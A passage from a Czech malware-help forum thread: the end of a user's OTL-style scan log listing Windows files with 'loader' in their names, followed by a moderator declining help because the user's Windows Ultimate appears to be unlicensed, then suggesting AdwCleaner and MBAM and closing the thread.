[2012.09.04 22:34:12 | 000,088,968 | ---- | M] () -- \Program Files (x86)\NVIDIA Corporation\PhysX\Common\PhysXUpdateLoader64.dll
[2011.07.08 15:53:48 | 000,000,816 | ---- | M] () -- \Program Files\MATLAB\R2011b\bin\registry\dotnetcli_loader.xml
[2011.08.13 23:39:38 | 000,008,704 | ---- | M] () -- \Program Files\MATLAB\R2011b\bin\win64\dotnetcli_loader.dll
[2011.07.11 21:17:24 | 000,015,012 | ---- | M] () -- \Program Files\MATLAB\R2011b\help\toolbox\javabuilder\MWArrayAPI\com\mathworks\toolbox\javabuilder\MWCtfClassLoaderSource.html
[2009.09.21 06:46:08 | 000,015,003 | ---- | M] () -- \Program Files\MATLAB\R2011b\sys\perl\win32\lib\AutoLoader.pm
[2005.09.12 13:21:36 | 000,000,727 | ---- | M] () -- \Program Files\MATLAB\R2011b\sys\perl\win32\lib\ByteLoader.pm
[2010.01.26 22:16:30 | 000,027,274 | ---- | M] () -- \Program Files\MATLAB\R2011b\sys\perl\win32\lib\DynaLoader.pm
[2008.10.25 14:58:38 | 000,017,776 | ---- | M] () -- \Program Files\MATLAB\R2011b\sys\perl\win32\lib\SelfLoader.pm
[2010.01.26 22:16:30 | 000,010,882 | ---- | M] () -- \Program Files\MATLAB\R2011b\sys\perl\win32\lib\XSLoader.pm
[2010.01.26 22:18:04 | 000,032,875 | ---- | M] () -- \Program Files\MATLAB\R2011b\sys\perl\win32\lib\auto\ByteLoader\ByteLoader.dll
[2008.06.07 07:04:56 | 000,001,378 | ---- | M] () -- \Program Files\MATLAB\R2011b\sys\perl\win32\lib\Locale\Maketext\GutsLoader.pm
[2011.02.27 20:20:44 | 000,008,863 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\datafeed\datafeed\rdthloader.m
[2011.05.06 15:32:02 | 000,009,209 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\datafeed\datafeed\rnseloader.m
[2009.01.23 16:29:42 | 000,000,386 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\idelink\foundation\lfsocket\lfsocket\lfsocket_loaderrortable.m
[2010.01.31 22:11:52 | 000,011,380 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\instrument\instrument\private\privateIviComLoader.m
[2008.10.08 12:14:06 | 000,000,257 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\local\classloader.txt
[2008.03.13 13:38:08 | 000,609,990 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\physmod\sh\shdemos\front_loader.bmp
[2011.06.02 17:25:12 | 000,182,295 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\physmod\sh\shdemos\sh_front_loader_actuation_system.mdl
[2011.07.09 07:22:14 | 000,004,360 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\physmod\sh\shdemos\html\sh_front_loader_actuation_system.html
[2011.07.09 07:22:14 | 000,006,098 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\physmod\sh\shdemos\html\sh_front_loader_actuation_system.png
[2011.07.09 07:21:52 | 000,192,771 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\physmod\sh\shdemos\html\sh_front_loader_actuation_system_01.png
[2008.05.01 15:23:40 | 000,003,887 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\rtw\targets\mpc555dk\mpc555dk\mpc555_launch_downloader.m
[2011.07.08 18:23:18 | 000,000,935 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\rtw\targets\mpc555dk\mpc555dk\mpc555_launch_downloader.p
[2010.11.17 07:18:32 | 000,002,759 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\rtw\targets\xpc\xpc\bin\bootloader.bin
[2011.07.08 17:14:48 | 000,000,578 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\stm\stm\+stm\SimulinkModelLoader.p
[2011.08.06 05:32:46 | 000,032,256 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\symbolic\symbolic\mupadmexunloader.mexw64
[2010.10.25 13:41:30 | 000,004,375 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\systemtest\systemtest\+systest\+internal\+loading\@TestLoader\TestLoader.m
[2010.05.13 12:45:36 | 000,000,815 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\target\extensions\processor\tic2000\+tic2000\+targetprefext\@Peripheral\Flash_loaderAPIBrowse_UICallback.m
[2009.04.27 14:58:00 | 000,000,560 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\target\extensions\processor\tic2000\+tic2000\+targetprefext\@Peripheral\Flash_loaderAutomatic_UICallback.m
[2009.04.27 14:58:02 | 000,000,541 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\target\extensions\processor\tic2000\+tic2000\+targetprefext\@Peripheral\Flash_loaderEnable_Flash_UICallback.m
[2010.01.31 22:32:48 | 000,001,997 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\target\extensions\processor\tic2000\+tic2000\+targetprefext\@Peripheral\Flash_loaderExecute_UICallback.m
[2009.10.24 14:44:30 | 000,007,131 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\target\extensions\processor\tic2000\+tic2000\+targetprefext\@Peripheral\PeriphInitFlash_loader.m
[2007.09.27 14:17:42 | 000,085,352 | ---- | M] () -- \Program Files\Microsoft SDKs\Windows\v6.0A\Bin\IALoader.dll
[2012.06.09 18:19:37 | 000,055,296 | ---- | M] () -- \Program Files\WinRAR\Formats\ace32loader.exe
[2014.06.20 09:41:04 | 000,019,765 | ---- | M] () -- \Users\Lobo\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\2.1.0.23_0\js\configLoader.js
[2014.06.20 09:41:04 | 000,002,597 | ---- | M] () -- \Users\Lobo\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\2.1.0.23_0\js\scriptLoader.js
[2014.09.22 17:11:57 | 000,001,980 | ---- | M] () -- \Users\Lobo\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2KK1GQSS\AdLoader[1].htm
[2014.07.22 10:51:47 | 000,220,068 | ---- | M] () -- \Users\Lobo\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2KK1GQSS\loader.en_US[1].js
[2014.11.11 14:04:41 | 000,031,353 | ---- | M] () -- \Users\Lobo\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PXZ2RVZM\Loader[1].js
[2014.07.24 13:53:16 | 000,072,638 | ---- | M] () -- \Users\Lobo\AppData\Local\Skype\Apps\login\images\loader.gif
[2014.07.24 13:53:16 | 000,003,032 | ---- | M] () -- \Users\Lobo\AppData\Local\Skype\Apps\login\images\loader.png
[2014.07.24 13:53:16 | 000,006,012 | ---- | M] () -- \Users\Lobo\AppData\Local\Skype\Apps\login\images\normal\loader_15fps.gif
[2014.07.24 13:53:16 | 000,021,956 | ---- | M] () -- \Users\Lobo\AppData\Local\Skype\Apps\login\images\normal\loader_30fps.gif
[2014.07.24 13:53:16 | 000,009,772 | ---- | M] () -- \Users\Lobo\AppData\Local\Skype\Apps\login\images\retina\loader@2x.png
[2014.10.14 08:21:18 | 000,008,192 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\_MEI32082\_win32sysloader.pyd
[2014.11.13 10:32:45 | 000,008,192 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\_MEI32482\_win32sysloader.pyd
[2014.10.15 13:17:44 | 000,008,192 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\_MEI32522\_win32sysloader.pyd
[2014.11.28 09:34:15 | 000,008,192 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\_MEI32802\_win32sysloader.pyd
[2014.12.09 13:42:00 | 000,008,192 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\_MEI32842\_win32sysloader.pyd
[2014.11.13 00:01:00 | 000,008,192 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\_MEI32922\_win32sysloader.pyd
[2014.11.06 11:03:18 | 000,008,192 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\_MEI33162\_win32sysloader.pyd
[2014.12.01 09:22:19 | 000,008,192 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\_MEI33442\_win32sysloader.pyd
[2014.12.09 08:11:33 | 000,008,192 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\_MEI33443\_win32sysloader.pyd
[2014.12.05 16:45:54 | 000,008,192 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\_MEI33802\_win32sysloader.pyd
[2014.11.20 20:10:01 | 000,008,192 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\_MEI33882\_win32sysloader.pyd
[2014.05.19 19:02:16 | 000,006,494 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\avg_a02732\ProgData\AVG SafeGuard toolbar\FireFoxExt\15.3.0.10\modules\skin\ajax-loader.gif
[2014.05.19 19:02:16 | 000,000,729 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\avg_a02732\ProgData\AVG SafeGuard toolbar\FireFoxExt\15.3.0.10\modules\skin\loader.gif
[2014.05.19 19:02:16 | 000,019,497 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\avg_a02732\ProgFiles\AVG SafeGuard toolbar\UninstallRes\ClientPackage\Images\uninstall\loader.gif
[2014.05.19 19:02:26 | 000,006,494 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\avg_a06880\ProgData\AVG SafeGuard toolbar\FireFoxExt\18.1.0.443\modules\skin\ajax-loader.gif
[2014.05.19 19:02:26 | 000,000,729 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\avg_a06880\ProgData\AVG SafeGuard toolbar\FireFoxExt\18.1.0.443\modules\skin\loader.gif
[2014.05.19 19:02:26 | 000,004,178 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\avg_a06880\ProgFiles\AVG SafeGuard toolbar\Chrome\content\icons\loader.gif
[2014.05.19 19:02:26 | 000,019,497 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\avg_a06880\ProgFiles\AVG SafeGuard toolbar\UninstallRes\ClientPackage\Images\uninstall\loader.gif
[2014.09.02 11:02:30 | 000,002,193 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\s110\images\loader.gif
[2014.05.19 19:02:26 | 000,019,497 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\UninstallRes\ClientPackage\Images\uninstall\loader.gif
[2014.10.16 09:31:18 | 000,001,408 | ---- | M] () -- \Users\Lobo\AppData\Roaming\Microsoft\Windows\SendTo\AVS Mobile Uploader.lnk
[2014.10.16 09:31:20 | 000,001,396 | ---- | M] () -- \Users\Lobo\AppData\Roaming\Microsoft\Windows\SendTo\AVS Video Uploader.lnk
[2014.11.27 08:30:13 | 000,024,760 | ---- | M] () -- \Windows\assembly\GAC_32\Microsoft.TeamFoundation.WorkItemTracking.Client.DataStoreLoader\11.0.0.0__b03f5f7f11d50a3a\Microsoft.TeamFoundation.WorkItemTracking.Client.DataStoreLoader.dll
[2014.11.27 08:30:13 | 000,023,224 | ---- | M] () -- \Windows\assembly\GAC_64\Microsoft.TeamFoundation.WorkItemTracking.Client.DataStoreLoader\11.0.0.0__b03f5f7f11d50a3a\Microsoft.TeamFoundation.WorkItemTracking.Client.DataStoreLoader.dll
[2014.11.27 09:08:49 | 000,020,480 | ---- | M] () -- \Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Tde5bef3b#\4a088e8987f29c42bc0a97aeae2ac534\Microsoft.TeamFoundation.WorkItemTracking.Client.DataStoreLoader.ni.dll
[2014.11.27 09:08:49 | 000,000,376 | ---- | M] () -- \Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Tde5bef3b#\4a088e8987f29c42bc0a97aeae2ac534\Microsoft.TeamFoundation.WorkItemTracking.Client.DataStoreLoader.ni.dll.aux
[2014.11.27 09:06:10 | 000,027,136 | ---- | M] () -- \Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Tde5bef3b#\a48181287797e486eef52377c6d92965\Microsoft.TeamFoundation.WorkItemTracking.Client.DataStoreLoader.ni.dll
[2014.11.27 09:06:10 | 000,000,376 | ---- | M] () -- \Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Tde5bef3b#\a48181287797e486eef52377c6d92965\Microsoft.TeamFoundation.WorkItemTracking.Client.DataStoreLoader.ni.dll.aux
[2007.11.07 10:21:26 | 000,072,192 | R--- | M] () -- \Windows\Installer\$PatchCache$\Managed\4E1DAD7D4F54B2B398A9AE271876CEF4\9.0.21022\FL_coloader80_dll_128691_128691_x86_ln.3643236F_FC70_11D3_A536_0090278A1BB8
[2007.11.06 20:10:00 | 000,004,096 | R--- | M] () -- \Windows\Installer\$PatchCache$\Managed\4E1DAD7D4F54B2B398A9AE271876CEF4\9.0.21022\FL_coloader80_tlb_128927_128927_x86_ln.3643236F_FC70_11D3_A536_0090278A1BB8
[2007.11.07 09:21:26 | 000,072,192 | R--- | M] () -- \Windows\Installer\$PatchCache$\Managed\C04B3576DBF0DEB3A8D9A0AC2CCD8DD5\9.0.21022\FL_coloader80_dll_128691_128691_x86_ln.3643236F_FC70_11D3_A536_0090278A1BB8
[2007.11.06 19:10:00 | 000,004,096 | R--- | M] () -- \Windows\Installer\$PatchCache$\Managed\C04B3576DBF0DEB3A8D9A0AC2CCD8DD5\9.0.21022\FL_coloader80_tlb_128927_128927_x86_ln.3643236F_FC70_11D3_A536_0090278A1BB8
[2009.07.14 02:03:49 | 000,003,584 | -H-- | M] () -- \Windows\System32\api-ms-win-core-libraryloader-l1-1-0.dll
[2009.07.14 02:15:12 | 000,038,400 | ---- | M] () -- \Windows\System32\dmloader.dll
[2014.01.29 03:11:28 | 000,012,532 | ---- | M] () -- \Windows\System32\Adobe\Shockwave 12\shockwave_Projector_Loader.dcr
[2014.01.29 05:39:46 | 000,009,622 | ---- | M] () -- \Windows\System32\Macromed\Shockwave 10\shockwave_Projector_Loader.dcr
[2009.07.14 02:03:49 | 000,003,584 | -H-- | M] () -- \Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
[2009.07.14 02:15:12 | 000,038,400 | ---- | M] () -- \Windows\SysWOW64\dmloader.dll
[2014.01.29 03:11:28 | 000,012,532 | ---- | M] () -- \Windows\SysWOW64\Adobe\Shockwave 12\shockwave_Projector_Loader.dcr
[2014.01.29 05:39:46 | 000,009,622 | ---- | M] () -- \Windows\SysWOW64\Macromed\Shockwave 10\shockwave_Projector_Loader.dcr
[2009.07.14 02:40:31 | 000,047,616 | ---- | M] () -- \Windows\winsxs\amd64_microsoft-windows-audio-dmusic_31bf3856ad364e35_6.1.7600.16385_none_a1e90d98a953d601\dmloader.dll
[2009.07.14 02:24:53 | 000,003,584 | -H-- | M] () -- \Windows\winsxs\amd64_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7600.16385_none_66a6e19d9580f9e3\api-ms-win-core-libraryloader-l1-1-0.dll
[2009.07.14 16:17:49 | 000,004,431 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-b..os-loader.resources_31bf3856ad364e35_6.1.7600.16385_cs-cz_8f37605116ba80bc.manifest
[2009.07.14 16:17:49 | 000,033,360 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-b..os-loader.resources_31bf3856ad364e35_6.1.7600.16385_cs-cz_8f37605116ba80bc_winload.efi.mui_35ee487d
[2009.07.14 16:17:49 | 000,034,896 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-b..os-loader.resources_31bf3856ad364e35_6.1.7600.16385_cs-cz_8f37605116ba80bc_winload.exe.mui_3bc5b827
[2009.07.14 16:17:49 | 000,029,776 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-b..os-loader.resources_31bf3856ad364e35_6.1.7600.16385_cs-cz_8f37605116ba80bc_winresume.efi.mui_f412814e
[2009.07.14 16:17:49 | 000,030,288 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-b..os-loader.resources_31bf3856ad364e35_6.1.7600.16385_cs-cz_8f37605116ba80bc_winresume.exe.mui_ff8b5358
[2009.07.14 03:58:45 | 000,005,745 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_6.1.7600.16385_none_b71babd98657e6ef.manifest
[2009.07.14 03:58:45 | 000,641,088 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_6.1.7600.16385_none_b71babd98657e6ef_winload.efi_75834aa0
[2009.07.14 03:58:45 | 000,604,192 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_6.1.7600.16385_none_b71babd98657e6ef_winload.exe_75835076
[2009.07.14 03:58:45 | 000,557,136 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_6.1.7600.16385_none_b71babd98657e6ef_winresume.efi_85cd069f
[2009.07.14 03:58:45 | 000,518,352 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_6.1.7600.16385_none_b71babd98657e6ef_winresume.exe_85cd1215
[2009.07.14 03:57:50 | 000,002,896 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-s..ive-blackbox-loader_31bf3856ad364e35_6.1.7600.16385_none_c72819e06acceb59.manifest
[2009.07.14 03:57:50 | 000,019,008 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-s..ive-blackbox-loader_31bf3856ad364e35_6.1.7600.16385_none_c72819e06acceb59_spldr.sys_98bd87a0
[2009.07.14 16:15:51 | 000,004,431 | ---- | M] () -- \Windows\winsxs\Manifests\amd64_microsoft-windows-b..os-loader.resources_31bf3856ad364e35_6.1.7600.16385_cs-cz_8f37605116ba80bc.manifest
[2009.07.14 03:13:42 | 000,005,745 | ---- | M] () -- \Windows\winsxs\Manifests\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_6.1.7600.16385_none_b71babd98657e6ef.manifest
[2011.02.05 14:09:31 | 000,005,745 | ---- | M] () -- \Windows\winsxs\Manifests\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_6.1.7600.16757_none_b73e23c9863dba66.manifest
[2011.02.05 14:04:44 | 000,005,745 | ---- | M] () -- \Windows\winsxs\Manifests\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_6.1.7600.20897_none_b79c80e49f7bc9f4.manifest
[2011.02.05 18:34:23 | 000,005,745 | ---- | M] () -- \Windows\winsxs\Manifests\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_6.1.7601.17556_none_b923808583650cfb.manifest
[2011.02.05 14:09:57 | 000,005,745 | ---- | M] () -- \Windows\winsxs\Manifests\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_6.1.7601.21655_none_b9ac1d069c83936e.manifest
[2009.07.14 03:18:27 | 000,002,896 | ---- | M] () -- \Windows\winsxs\Manifests\amd64_microsoft-windows-s..ive-blackbox-loader_31bf3856ad364e35_6.1.7600.16385_none_c72819e06acceb59.manifest
[2009.07.14 02:15:12 | 000,038,400 | ---- | M] () -- \Windows\winsxs\x86_microsoft-windows-audio-dmusic_31bf3856ad364e35_6.1.7600.16385_none_45ca7214f0f664cb\dmloader.dll
[2009.07.14 02:03:49 | 000,003,584 | -H-- | M] () -- \Windows\winsxs\x86_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7600.16385_none_0a884619dd2388ad\api-ms-win-core-libraryloader-l1-1-0.dll

< End of report >
Nahoru
Uživatelský avatar
vyosek
VIP
VIP
Příspěvky: 56373
Registrován: 07 lis 2006 15:24
Bydliště: Šalingrad - Brno

Re: Malware - prosim o kontrolu logu

#6 Příspěvek od vyosek »

:arrow: Jen se zeptam pouzivate legalni operacni system, nejvyssi licence (v hodnote nejake tisic) Ultimate zrovna neni bezna domaci verze
"Kdo víno má a nepije,kdo hrozny má a nejí je, kdo ženu má a nelíbá, kdo zábavě se vyhýbá, na toho vemte bič a hůl, to není člověk, to je vůl."
Člen Obrázek od 1. února 2011.
Nahoru
chvostik
Návštěvník
Návštěvník
Příspěvky: 31
Registrován: 04 dub 2008 17:37

Re: Malware - prosim o kontrolu logu

#7 Příspěvek od chvostik »

ja myslim že z logu jde poznat že ne, je to problém?
Nahoru
Uživatelský avatar
vyosek
VIP
VIP
Příspěvky: 56373
Registrován: 07 lis 2006 15:24
Bydliště: Šalingrad - Brno

Re: Malware - prosim o kontrolu logu

#8 Příspěvek od vyosek »

Ano, je to problem - nase forum se nezabyva nelegalnimi systemy - je to zcela jasne popsano v pravidlech fora i charte mezinarodni aliance ASAP, jejiz jsme cleny...

Je mi lito...
"Kdo víno má a nepije,kdo hrozny má a nejí je, kdo ženu má a nelíbá, kdo zábavě se vyhýbá, na toho vemte bič a hůl, to není člověk, to je vůl."
Člen Obrázek od 1. února 2011.
Nahoru
chvostik
Návštěvník
Návštěvník
Příspěvky: 31
Registrován: 04 dub 2008 17:37

Re: Malware - prosim o kontrolu logu

#9 Příspěvek od chvostik »

tak to mohu jen doufat, že to ESET ke mě nepustil (zatím mě nikdy nezradil)..i tak díky za váš čas
Nahoru
Uživatelský avatar
vyosek
VIP
VIP
Příspěvky: 56373
Registrován: 07 lis 2006 15:24
Bydliště: Šalingrad - Brno

Re: Malware - prosim o kontrolu logu

#10 Příspěvek od vyosek »

:arrow: Bohuzel pustit

:arrow: Poohlednete se po AdwCleaneru a MBAMu - vice poradit nemohu

Pekny vecer i Vam a dekuji za pochopeni :worship:


:closed:
"Kdo víno má a nepije,kdo hrozny má a nejí je, kdo ženu má a nelíbá, kdo zábavě se vyhýbá, na toho vemte bič a hůl, to není člověk, to je vůl."
Člen Obrázek od 1. února 2011.
Nahoru
Zamčeno

Zpět na „Řešení problémů, logy“